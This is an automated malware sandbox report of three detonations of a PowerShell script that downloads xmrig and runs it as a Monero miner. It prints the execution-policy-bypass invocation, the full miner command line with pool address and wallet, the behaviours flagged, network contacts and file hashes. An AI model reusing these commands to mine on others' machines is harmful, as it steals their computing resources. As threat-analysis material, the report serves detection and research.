2024-05-27 00:27
Reported
2024-05-27 01:26
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2232 wrote to memory of 660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2232 wrote to memory of 660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/2232-3-0x00007FFD3DDC3000-0x00007FFD3DDC4000-memory.dmp
memory/2232-5-0x000001BD3F640000-0x000001BD3F662000-memory.dmp
memory/2232-8-0x00007FFD3DDC0000-0x00007FFD3E7AC000-memory.dmp
memory/2232-9-0x000001BD3F7F0000-0x000001BD3F866000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yvxvpglx.3ub.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2232-10-0x00007FFD3DDC0000-0x00007FFD3E7AC000-memory.dmp
memory/2232-25-0x00007FFD3DDC0000-0x00007FFD3E7AC000-memory.dmp
memory/2232-48-0x000001BD3F7D0000-0x000001BD3F7E2000-memory.dmp
memory/2232-61-0x000001BD3F7C0000-0x000001BD3F7CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/660-90-0x0000019D00900000-0x0000019D00920000-memory.dmp
memory/660-91-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/2232-92-0x00007FFD3DDC0000-0x00007FFD3E7AC000-memory.dmp
memory/2232-94-0x00007FFD3DDC3000-0x00007FFD3DDC4000-memory.dmp
memory/660-93-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/2232-95-0x00007FFD3DDC0000-0x00007FFD3E7AC000-memory.dmp
memory/2232-96-0x00007FFD3DDC0000-0x00007FFD3E7AC000-memory.dmp
memory/660-97-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-98-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-99-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-100-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-101-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-102-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-103-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-104-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-105-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-106-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-107-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-108-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-109-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-110-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-111-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-112-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-113-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-114-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-115-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-116-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-117-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-118-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-119-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-120-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-121-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-122-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-123-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-124-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-125-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-126-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-127-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-128-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-129-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-130-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-131-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-132-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-133-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-134-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-135-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-136-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-137-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-138-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-139-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-140-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-141-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-142-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-143-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-144-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-145-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-146-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-147-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-148-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-149-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-150-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-151-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-152-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-153-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-154-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-155-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-156-0x00007FF645660000-0x00007FF646293000-memory.dmp
memory/660-157-0x00007FF645660000-0x00007FF646293000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:27
Platform
win11-20240426-en
Max time kernel
1788s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 2444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5008 wrote to memory of 2444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/5008-0-0x00007FFB83433000-0x00007FFB83435000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfz52wzz.10l.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5008-9-0x0000019DF3080000-0x0000019DF30A2000-memory.dmp
memory/5008-10-0x00007FFB83430000-0x00007FFB83EF2000-memory.dmp
memory/5008-11-0x00007FFB83430000-0x00007FFB83EF2000-memory.dmp
memory/5008-12-0x00007FFB83430000-0x00007FFB83EF2000-memory.dmp
memory/5008-14-0x0000019DF3580000-0x0000019DF3592000-memory.dmp
memory/5008-15-0x0000019DF3110000-0x0000019DF311A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2444-46-0x000001F6E9490000-0x000001F6E94B0000-memory.dmp
memory/2444-47-0x000001F6E97B0000-0x000001F6E97D0000-memory.dmp
memory/2444-48-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-49-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-52-0x000001F6EAFA0000-0x000001F6EAFC0000-memory.dmp
memory/2444-51-0x000001F6E97D0000-0x000001F6E97F0000-memory.dmp
memory/5008-50-0x00007FFB83430000-0x00007FFB83EF2000-memory.dmp
memory/5008-53-0x00007FFB83433000-0x00007FFB83435000-memory.dmp
memory/2444-54-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-55-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-56-0x000001F6E97D0000-0x000001F6E97F0000-memory.dmp
memory/2444-57-0x000001F6EAFA0000-0x000001F6EAFC0000-memory.dmp
memory/2444-58-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-59-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-60-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-61-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-62-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-63-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-64-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-65-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-66-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-67-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-68-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-69-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-70-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-71-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-72-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-73-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-74-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-75-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-76-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-77-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-78-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-79-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-80-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-81-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-82-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-83-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-84-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-85-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-86-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-87-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-88-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-89-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-90-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-91-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-92-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-93-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-94-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-95-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-96-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-97-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-98-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-99-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-100-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-101-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-102-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-103-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-104-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-105-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-106-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-107-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-108-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-109-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-110-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-111-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-112-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-113-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-114-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-115-0x00007FF658C50000-0x00007FF659883000-memory.dmp
memory/2444-116-0x00007FF658C50000-0x00007FF659883000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:23
Platform
win10v2004-20240426-en
Max time kernel
1791s
Max time network
1767s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4428 wrote to memory of 4628 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4428 wrote to memory of 4628 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
